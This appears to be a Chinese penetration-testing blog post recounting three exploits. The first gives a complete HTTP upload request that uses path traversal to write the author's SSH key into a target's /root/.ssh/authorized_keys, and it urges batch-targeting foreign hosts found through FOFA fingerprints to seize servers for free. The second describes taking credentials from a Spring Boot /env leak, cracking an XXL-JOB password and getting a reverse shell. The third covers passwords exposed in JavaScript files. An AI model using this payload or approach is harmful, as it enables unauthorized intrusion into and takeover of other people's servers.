0%

杂七杂八的学习与实战日常×3

一想到还得专门写好几篇就头大犯懒,所以改成写个小集合,最近忙东忙西博客更新停滞了,以后会提上来的。

日常1 上传文件处可指定任意目录+ssh免密登录

成功复现了一个漏洞,往目标主机里写ssh免密登录

先生成密钥文件

1
2
ssh-keygen -t rsa 
cat /root/.ssh/id_rsa.pub #可以拿来用啦

poc如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
POST /upload/UploadServlet HTTP/1.1
Content-Length: 1283
Content-Type: multipart/form-data; boundary=8mR-ztMG5r-q5b7yp-IaAs20oaFQVH
Host: 码码码码码码码码码码码码码码
Connection: Keep-Alive
Accept-Encoding: gzip

--8mR-ztMG5r-q5b7yp-IaAs20oaFQVH
Content-Disposition: form-data; name="access_token"
Content-Type: text/plain; charset=UTF-8

5d64e94b10e14025a234c4f6870c38e0
--8mR-ztMG5r-q5b7yp-IaAs20oaFQVH
Content-Disposition: form-data; name="validTime"
Content-Type: text/plain; charset=UTF-8

1.0
--8mR-ztMG5r-q5b7yp-IaAs20oaFQVH
Content-Disposition: form-data; name="userId"
Content-Type: text/plain; charset=UTF-8

10002341
--8mR-ztMG5r-q5b7yp-IaAs20oaFQVH
Content-Disposition: form-data; name="file1"; filename="../../../../../../../../../../../../../../../../../../../root/.ssh/authorized_keys"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

ssh-rsa AAAAB3NzaC此处是自己这边生成的密钥文件,上传这个authorized_keys可轻松实现免密登录LbGM= root@kali

但是想要扒拉东西的话,这样很慢,上winscp免密登录比较好一些

搭配fofa指纹批量,目标只要对准国外主机,分分钟拥有一堆国外的公网服务器

你的下一台主机,何必花钱是买来的?(狗头保命)

这个是有一定概率不成功的,比如根本没这个目录、比如根本没开这个端口、比如权限问题等等

大部分还是能成的

日常2 springboot信息泄露+XXL-JOB反弹shell

32位的弱口令泄露 爱来自/env目录

登上去后搜到了Redis和MySQL数据库密码

32位,看起来很复杂,对8?在复杂他也是弱口令

搭配扫描工具还发现个XXL-JOB系统 密码不是admin 123456这种的,那就先不管

连上两个数据库,发现其中一个存的有这个XXL-JOB的账号信息

md5解开来是111111 反正这个也不需要验证码也没有次数限制,爆破也是可以的,只不过爆破实属下下策,不建议考虑

后续就是已知公开的漏洞,计划任务公网弹shell

在后面,你懂得(狗头保命)

日常3 为啥密码直接在js文件里能搜到啊?

我不理解 打开js文件搜一下password 用户名和密码全给出来了

比如这样↓↓↓

还有这种好事?还真有这种好事……

好事,好事,好事啊

遇见一回两回就算了,遇见太多回了所以单独拎出来写一下,也许这是一处非凡的突破口。

每个人渗透习惯不同,有的人可能就发现不了,反正我是会偶尔扒拉一下js文件的。


无论何时放弃都不是最好的选择,坚持才是

本文结束,感谢您的阅读看到这里的师傅博主非常感谢